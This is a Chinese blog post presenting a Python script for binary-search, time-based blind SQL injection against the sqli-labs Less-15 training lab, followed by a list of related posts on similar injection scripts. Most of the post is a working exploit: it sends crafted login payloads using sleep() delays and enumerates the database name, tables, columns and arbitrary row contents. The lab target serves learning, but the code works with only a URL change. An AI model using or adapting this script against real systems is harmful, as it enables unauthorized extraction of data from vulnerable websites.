python的sqli-labs15的二分法时间盲注

最新推荐文章于 2024-04-07 05:35:29 发布
最新推荐文章于 2024-04-07 05:35:29 发布
阅读量4k 收藏 3
点赞数
文章标签: python sql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Programmonkeykin/article/details/121871869
版权

1.导入库。

2.按ASCII码从小到大编写常见的符号、字符、数字。

3.编写实验对应库的地址,这里的url根据自己的实际状况而言。

 

编写get_length函数:

 

其二分盲注实现的完整代码如下:

Payload="admin'andif((length(({}))={}),sleep(2),if((length(({}))>{}),sleep(3),1))#".format(data_payload,n,data_payload,n)

即,如果我们定义的数据长度n刚好等于我们所要获取的数据长度,那么执行sleep(2),如果大于数据长度n,则执行sleep(3),否则就返回1。

于是我们就可以通过导入的time库,计算完成一次sql盲注的时间,从而判断我们盲注的是否正确。

编写get_data函数:

 

不同于get_length的是,这里的n代表的是在value数组中的下标。

Payload构建了三个,实际上只要构建两个表达式就好了。用use_time来鉴别盲注是否正确。

这一函数的功能,举个列子,一个表名叫users,我们根据get_length的函数得到了他的长度为5,那么搭建一个循环次数为五次的循环体,每个循环体内去做盲注插入,得到每个对应的字母。

编写get_number函数。

 

这里的函数主要功能是判别一个库中有几个表,一个表中有几个列。依旧是通过时间盲注的方法达成目的。

搭建好三个函数,就可以进行我们的SQL二分盲注。

整个主函数如下:

 

这里是用get_length爆数据库的长度,用get_data爆数据库的名字,用get_number爆表的个数。

结果如下:

 

接下来对爆表的信息:

 

得到的结果如下:

 

 

 

接下去,由于是时间盲注,将全部信息爆出来很费时间,所以就按个人的要求爆出信息,即选择哪个表,那个列,具体代码如下:

 

我个人输入如下:

 

得到的结果如下:

 

import requests
import time
url = "http://localhost/Less-15/"
value ="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghigklmnopqrstuvwxyz"
print(value[62])
def get_number(data_payload):
    for n in range(0,100):
        
        dd=data_payload+' limit %d,1'%n
        #dd="select table_name from information_schema.tables where table_schema='security' limit %d,1"%n
        payload="admin' and if(length(({}))>0,1,sleep(2)) #".format(dd)
        data = {
    
    "uname": payload, "passwd": "admin", "submit": "submit"}
        start_time = time.time()
        html = requests.post(url, data=data)
        end_time = time.time()
        use_time = end_time - start_time #求出请求前后的时间差来判断是否延时了
        if use_time>2:
            print(n)
            return n
def get_length(data_payload):#获取数据的长度
    minvalue=1
    maxvalue=20
    #时间盲注
    
    while(maxvalue>=minvalue):
        n=int((minvalue+maxvalue)/2)
        #print("n为%s"%n)
        #print("maxvalue为%s"%maxvalue)
        #print("minvalue为%s"%minvalue)
        payload = "admin' and if((length(({}))={}),sleep(2),if((length(({}))>{}),sleep(3),1)) #".format(data_payload, n,data_payload,n)
        data = {"uname": payload, "passwd": "admin", "submit": "submit"}
        start_time = time.time()
        html = requests.post(url, data=data)
        end_time = time.time()
        use_time = end_time - start_time #求出请求前后的时间差来判断是否延时了
        #print("用了时间%s"%use_time)
        if use_time > 2 and use_time < 3:
            #print("长度是 :"+ str(n))
            return n
        elif use_time > 3:
            minvalue=n+1
        else:
            maxvalue=n-1
    return -1        
    """
    for n in range(1, 100):
        payload = "admin' and if((length(({}))={}),sleep(2),1) #".format(data_payload, n)
        data = {"uname": payload, "passwd": "admin", "submit": "submit"}
        start_time = time.time()
        html = requests.post(url, data=data)
        end_time = time.time()
        use_time = end_time - start_time #求出请求前后的时间差来判断是否延时了
        if use_time > 2:
            #print("长度是 :"+ str(n))
            return n
    """
    
def get_data(data_payload,length):#获取数据
    result=''
    for n in range(1,length):
        """
        for v in value:
            payload = "admin' and if((ascii(substr(({}),{},1)) = '{}'),sleep(2),1) #".format(data_payload,n,ord(v))
            data = {"uname":payload,"passwd":"admin","submit":"submit"}
            start_time = time.time()
            requests.post(url,data=data)
            end_time = time.time()
            use_time = end_time - start_time
            # 为啥把sleep时间设这么长呢?原因是我这里时常会出现网络波动,有时候请求时间就有2秒多,为避免出现乱码,所以设长一点可以保证信息的准确性
            if use_time >2:
                result += v
                print(v,end="")
        """
        minvalue=0
        maxvalue=62
        while(maxvalue>=minvalue):
            v=int((minvalue+maxvalue)/2)
            payload1="admin' and if((ascii(substr(({}),{},1)) = '{}'),sleep(1),1) #".format(data_payload,n,ord(value[v]))
            payload2="admin' and if((ascii(substr(({}),{},1)) > '{}'),sleep(1),1) #".format(data_payload,n,ord(value[v]))
            payload3="admin' and if((ascii(substr(({}),{},1)) < '{}'),sleep(1),1) #".format(data_payload,n,ord(value[v]))
            data1 = {"uname":payload1,"passwd":"admin","submit":"submit"}
            data2 = {"uname":payload2,"passwd":"admin","submit":"submit"}
            data3 = {"uname":payload3,"passwd":"admin","submit":"submit"}
            start_time = time.time()
            html = requests.post(url, data=data1)
            end_time = time.time()
            use_time = end_time - start_time 
            if use_time > 1:
                result+=value[v]
                print(value[v],end="")
                break
                #print("长度是 :"+ str(n))   
            
            start_time = time.time()
            html = requests.post(url, data=data2)
            end_time = time.time()
            use_time = end_time - start_time     
            if use_time > 1:
                minvalue=v+1
            else:
                maxvalue=v-1
        
    return result

length = get_length('select database()') + 1  
print("数据库的长度是:%d"%(length-1))
print("数据库的名字是:",end="")
db_name=get_data('select database()',length)

print()
print("表的个数为:",end="")
data_payload="select table_name from information_schema.tables where table_schema='%s'"%db_name
table_number=get_number(data_payload)
print('')
for i in range(0,table_number):
    print('第%d个表的名字为:'%(i+1),end='')
    length=get_length("select table_name from information_schema.tables where table_schema='%s' limit %d,1"%(db_name,i))+1
    table_name=get_data("select table_name from information_schema.tables where table_schema='%s' limit %d,1"%(db_name,i),length)
    print()
    print("列的个数为:",end="")
    data_payload="select column_name from information_schema.columns where table_name='%s'"%table_name
    column_number=get_number(data_payload)
    for j in range(0,column_number):
        print('第%d个列的名字为:'%(j+1),end='')
        length=get_length("select column_name from information_schema.columns where table_name='%s' limit %d,1"%(table_name,j))+1
        column_name=get_data("select column_name from information_schema.columns where table_name='%s' limit %d,1"%(table_name,j),length)
        
        print()
    print()
    
    
while 1:
    table_n=input('请输入您要读取的表名,如果输入I want to leave,那么程序就会退出:')
    if table_n=='I want to leave' :
        break
    column_n=input('请输入您要读取的列名,如果输入I want to leave,那么程序就会退出:')
    if column_n=='I want to leave':
        break
    print()
    data_payload="select '%s' from %s "%(column_n,table_n)
    print("查询得到的内容条数:",end="")
    content_number=get_number(data_payload)
    for i in range(0,content_number):
        print('第%d条:'%(i+1),end='')
        length=get_length("select %s from %s limit %d,1"%(column_n,table_n,i))+1
        column_name=get_data("select %s from %s limit %d,1"%(column_n,table_n,i),length)
        print()
    print()

Programmonkeykin
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
sqli-labs(15-19关)
weixin_55843787的博客
04-16 3044
sqli-labs靶场过关 源码分析
【CTF_流量日志分析】二分法分析
serendipity1130的博客
10-16 1747
1.打开日志文件发现又是一道二分法流量,观察任意几条: 分析过程: 当状态码位200的时候,表示正确,报错为404,所以第21位大于101正确,大于102报错,所以正确字符为101,所以出来的字符串应该是状态码等于200时的字符或等于404时的ascii码减去1 2.根据以上分析写出脚本: import urllib.parse import requests,re f = open('日志里的秘密.log','r',encoding='gb18030',errors='ignore
NewStarCTF2023week4-midsql(利用二分查找实现时间攻击)
Welcome To Myon'Blog !
10-29 1161
代码通过不断猜测每个字符的 ASCII 值来构建数据库名,一旦一个字符的 ASCII 值被确定,就继续下一个字符。但是这里尝试了很多都只返回一个页面,没有出现报错页面,因此采用时间,利用sleep函数,制造时间延迟,由回显时间来判断是否报错。意:这里查询的内容还是需要加上 group_concat(),因为之前我做的一些联合查询有时候不需要加,但是在这里我试了,不行。(我最开始以为是and被过滤,并没有,如果是and或者or被过滤我们也可以使用 && 和 || 替代)
Python自动化sql入:布尔_布尔脚本
最新发布
2401_83739411的博客
04-07 809
学好 Python 不论是就业还是做副业赚钱都不错,但要学会 Python 还是要有一个学习规划。最后大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
python实现自动化延迟入-时间脚本-源代码
qq_54037445的博客
11-30 1600
在做手工的sql时间入时,他需要一个字符一个字符的去猜,如果手动的去一个尝试,会浪费大量的时间,所以当时也就是了解他的原理后就没有试过了,这次尝试用python实现时间
sqli-labs 9~10 多命通关攻略(Python3 自动化实现时间
两个月亮
01-13 774
三种输入,sqli-labs 的回显区域显示的内容均,因此我们只能使用基于时间入方式。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL入实验室...
sqli-labs(php7.3以上可运行)
01-29
sqli-labs提供了多种级别的SQL入练习,适合初学者到高级安全专家。每个级别都设计了一个具有不同安全漏洞的Web应用,用户可以通过尝试入SQL语句来解密问题,从而深入理解SQL入的各种技术和防御策略。 三、PHP...
sqli-labs的第15关的布尔脚本(附代码分析)
skoyine的博客
05-02 1459
sqli-labs的第15关布尔脚本 因为最近在复习python,所以找个项目练练手,本人是个菜鸡,代码哪里有问题欢迎大佬指出 import requests import time host = "http://127.0.0.1/sqli-labs/Less-15/" def getDatabase(): # 获取数据库名 global host ans = '' # 最外面的循环是数据库名的字符长度,就是从第几个字符开始
Sleep()函数的使用方法详解
热门推荐
H48530的博客
12-02 9万+
sleep函数 目录sleep函数用法意实例编写代码,演示多个字符从两端移动,向中间汇聚不休眠的状态:休眠sleep实现:for循环实现我们需要意: 用法 Sleep函数可以使计算机程序(进程,任务或线程)进入休眠,使其在一段时间内处于非活动状态。当函数设定的计时器到期,或者接收到信号、程序发生中断都会导致程序继续执行。 用 法 void Sleep(DWORD ms) 单 位 毫秒 在Windows系统中: 休眠一秒 Sleep(1000); //sleep for 1 s
二分查找在sql里面的应用
0verWatch的博客
08-27 2600
前言 最近在重新复习SQL入用了sqllabs这个靶场,发现在做的时候自己写的脚本,就一直自增去的话时间花费太大,所以就在看了看二分查找在这一方面的应用 确实快了不少,很久没有写过小脚本就手有点生疏了,赶紧记录一下 正文 二分查找又称折半查找,优点是比较次数少,查找速度快,平均性能好;其缺点是要求待查表为有序表,且插入删除困难。因此,折半查找方法适用于不经常变动而查找频繁的有序列...
mysql 二分法python脚本
weixin_30384217的博客
04-29 1343
import urllib import urllib2 def doinject(payload): url = 'xxxxxxxxxxxxxxxxxxxxx' values = {'injection':payload,'inject':'Inject'} data = urllib.urlencode(values) #print d...
vcdy
06-04 1294
http://127.0.0.1/sqli-labs/Less-5?id=1 and 1=1 --+ 正常http://127.0.0.1/sqli-labs/Less-5?id=1 and 1=2 --+ 正常http://127.0.0.1/sqli-labs/Less-5?id=1' and 1=2 --+ 不正常http://127.0.0.1/sqli-labs/Less-5?id=1'...
时间python脚本(二分查找优化)支持cookie
qq_36915061的博客
12-02 911
时间python脚本(二分查找优化)支持cookie入 菜鸟自用,仅供参考 使用说明 可根据用途更改payload中的select语句,字符型入点有两种入情况: 1、最后添加释符 2、最后的字符添加单引号,与原语句中的单引号闭合 get_length和get_name可结合使用 可根据自己的猜解范围调整min和max import requests import dat...
基于时间
weixin_40709439的博客
09-01 1万+
延时入,用的最多的入 常用的判断语句: ' and if(1=0,1, sleep(10)) --+  " and if(1=0,1, sleep(10)) --+ ) and if(1=0,1, sleep(10)) --+ ') and if(1=0,1, sleep(10)) --+ ") and if(1=0,1, sleep(10)) --+   写这篇文章只是为了更...
sql二分法入脚本
菜鸟-传奇
12-27 1003
sql二分法入脚本 次脚本可以用来检测sql靶场第五关 http://caichuanqi.cn/lab/sqli-labs-master/Less-5/?id=1 #-*-coding:utf-8-*- import requests import time #host = "http://web.jarvisoj.com:32787/login.php" host = "http:...
sqli-labs第七关
08-31
对于sqli-labs的第七关,这是一道关于的挑战。在这个关卡中,你需要利用漏洞来获取敏感信息。 是一种利用应用程序对用户输入的处理不当而导致的漏洞。这种漏洞通常出现在应用程序使用用户提供的数据来构建SQL查询语句时。攻击者可以通过在特定位置插入恶意的SQL代码来执行非授权操作。 在第七关中,你需要尝试通过来获取数据库中的敏感信息。你可以尝试使用不同的布尔型时间延迟等技巧来判断SQL查询语句的真假,并逐步推测出数据库中的内容。 具体的解题方法和技巧可以参考sqli-labs官方文档或者其他相关资源,在理解漏洞的基础上进行尝试。记得在实践过程中保持安全意识,仅针对合法的测试环境进行操作,并遵循道德和法律规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Programmonkeykin

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值